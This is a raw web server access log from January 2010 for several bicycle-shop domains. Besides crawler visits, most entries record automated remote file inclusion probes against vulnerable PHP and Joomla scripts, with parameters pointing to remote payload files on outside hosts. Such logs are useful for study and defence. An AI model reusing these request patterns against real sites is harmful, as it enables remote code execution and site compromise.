74.223.143.131 - - [11/Jan/2010:08:21:33 -0800] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:21:35 -0800] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:08:21:35 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:08:27:19 -0800] "GET /logs/access.log//ask_password.php?dir=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:08:27:19 -0800] "GET /ask_password.php?dir=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.100.249.238 - - [11/Jan/2010:08:27:19 -0800] "GET /logs//ask_password.php?dir=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.183 - - [11/Jan/2010:08:36:22 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.111.183 - - [11/Jan/2010:08:36:22 -0800] "GET /logs/?S=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
207.46.199.177 - - [11/Jan/2010:08:38:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "houstonbikeshop.com"
66.249.65.150 - - [11/Jan/2010:09:04:11 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "houstonbikeshop.com"
64.62.128.254 - - [11/Jan/2010:09:21:14 -0800] "GET /logs/errors.php?error=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [11/Jan/2010:09:21:15 -0800] "GET /errors.php?error=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [11/Jan/2010:09:21:19 -0800] "GET /logs/access.log/errors.php?error=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [11/Jan/2010:09:21:19 -0800] "GET /logs/errors.php?error=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [11/Jan/2010:09:21:19 -0800] "GET /errors.php?error=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.17 - - [11/Jan/2010:09:26:18 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "houstonbikeshop.com"
64.62.128.254 - - [11/Jan/2010:09:38:42 -0800] "GET /logs/access.log%20%20/errors.php?error=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [11/Jan/2010:09:38:45 -0800] "GET /logs/access.log%20%20/errors.php?error=http://jesus91.or.kr/new/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:09:51:26 -0800] "GET /errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:09:51:26 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:09:51:26 -0800] "GET /logs/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:09:51:28 -0800] "GET /errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:09:51:28 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:09:51:28 -0800] "GET /logs/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.74.220.82 - - [11/Jan/2010:10:00:06 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.74.220.82 - - [11/Jan/2010:10:00:06 -0800] "GET /errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.74.220.82 - - [11/Jan/2010:10:00:30 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.74.220.82 - - [11/Jan/2010:10:00:31 -0800] "GET /logs/errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.74.220.82 - - [11/Jan/2010:10:00:31 -0800] "GET /errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.193.32 - - [11/Jan/2010:10:07:23 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "bicyclestoreshouston.com"
114.203.85.242 - - [11/Jan/2010:10:11:06 -0800] "GET //appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:11:07 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:11:07 -0800] "GET /logs///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.183 - - [11/Jan/2010:10:13:49 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
114.203.85.242 - - [11/Jan/2010:10:16:23 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:10:24:09 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:10:24:09 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:10:24:09 -0800] "GET /logs/access.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:10:24:32 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:10:24:33 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:10:24:33 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:10:24:34 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:10:24:34 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:10:24:34 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/errors.php?error=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:10:24:55 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:10:24:55 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:10:24:55 -0800] "GET /logs/access.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:26:04 -0800] "GET //appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:26:05 -0800] "GET /logs///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:26:05 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.64.213.175 - - [11/Jan/2010:10:27:31 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.64.213.175 - - [11/Jan/2010:10:27:31 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:30:54 -0800] "GET //appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:30:56 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:30:56 -0800] "GET /logs///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:10:33:34 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:34:15 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:10:34:57 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Jan/2010:10:37:30 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Jan/2010:10:37:30 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Jan/2010:10:37:30 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Jan/2010:10:37:37 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Jan/2010:10:37:37 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Jan/2010:10:37:37 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Jan/2010:10:39:17 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Jan/2010:10:39:17 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Jan/2010:10:39:17 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.64.213.175 - - [11/Jan/2010:10:46:23 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:10:48:28 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:10:48:28 -0800] "GET /logs//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:10:48:28 -0800] "GET /appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:48:54 -0800] "GET //appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:48:54 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:48:55 -0800] "GET /logs///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.203.85.242 - - [11/Jan/2010:10:54:39 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:10:58:35 -0800] "GET /logs/access.log%20%20/skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:10:58:35 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:10:58:35 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:10:58:56 -0800] "GET /logs/access.log%20%20/skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:10:58:56 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:10:58:56 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.193.42 - - [11/Jan/2010:11:00:17 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.svbikes.com"
125.141.91.138 - - [11/Jan/2010:11:07:05 -0800] "GET /logs/access.log%20%20//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53/component/option,com_sitemap/Itemid,79/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:11:07:05 -0800] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53/component/option,com_sitemap/Itemid,79/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:11:07:05 -0800] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53/component/option,com_sitemap/Itemid,79/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:11:10:19 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:11:10:19 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:11:10:19 -0800] "GET /logs/access.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.46.199.177 - - [11/Jan/2010:11:27:44 -0800] "GET /bullitinboard/viewtopic.php?p=2169 HTTP/1.1" 200 533 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "houstonbikeshop.com"
222.73.17.7 - - [11/Jan/2010:11:36:10 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Jan/2010:11:36:11 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.73.17.7 - - [11/Jan/2010:11:36:11 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:11:41:09 -0800] "GET /translations/Italian.txt%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:11:41:09 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:11:41:09 -0800] "GET /translations/////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 3863 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.106.21.31 - - [11/Jan/2010:11:43:20 -0800] "GET /logs/access.log/nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.31 - - [11/Jan/2010:11:43:21 -0800] "GET /nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.31 - - [11/Jan/2010:11:43:21 -0800] "GET /logs/access.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.31 - - [11/Jan/2010:11:43:21 -0800] "GET /logs/nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.31 - - [11/Jan/2010:11:43:22 -0800] "GET /errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.31 - - [11/Jan/2010:11:43:22 -0800] "GET /logs/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.31 - - [11/Jan/2010:11:47:26 -0800] "GET /errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.106.21.31 - - [11/Jan/2010:11:47:26 -0800] "GET /nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:47:36 -0800] "GET /errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:47:43 -0800] "GET /nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:49:40 -0800] "GET /logs/access.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:49:42 -0800] "GET /errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:49:42 -0800] "GET /logs/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:49:45 -0800] "GET /logs/access.log/nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:49:48 -0800] "GET /nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:49:49 -0800] "GET /logs/nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:55:21 -0800] "GET /logs/access.log/nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:55:21 -0800] "GET /nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:55:21 -0800] "GET /logs/nerrors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:55:47 -0800] "GET /logs/access.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:55:47 -0800] "GET /errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
199.120.90.223 - - [11/Jan/2010:11:55:47 -0800] "GET /logs/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
87.250.252.242 - - [11/Jan/2010:12:06:54 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.svbikes.com"
125.160.17.200 - - [11/Jan/2010:12:14:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:14:11 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:14:11 -0800] "GET /skin/zero_vote/error.php?dir=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:14:47 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:14:47 -0800] "GET /skin/zero_vote/error.php?dir=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:14:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [11/Jan/2010:12:21:21 -0800] "GET /logs/access.log//export.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
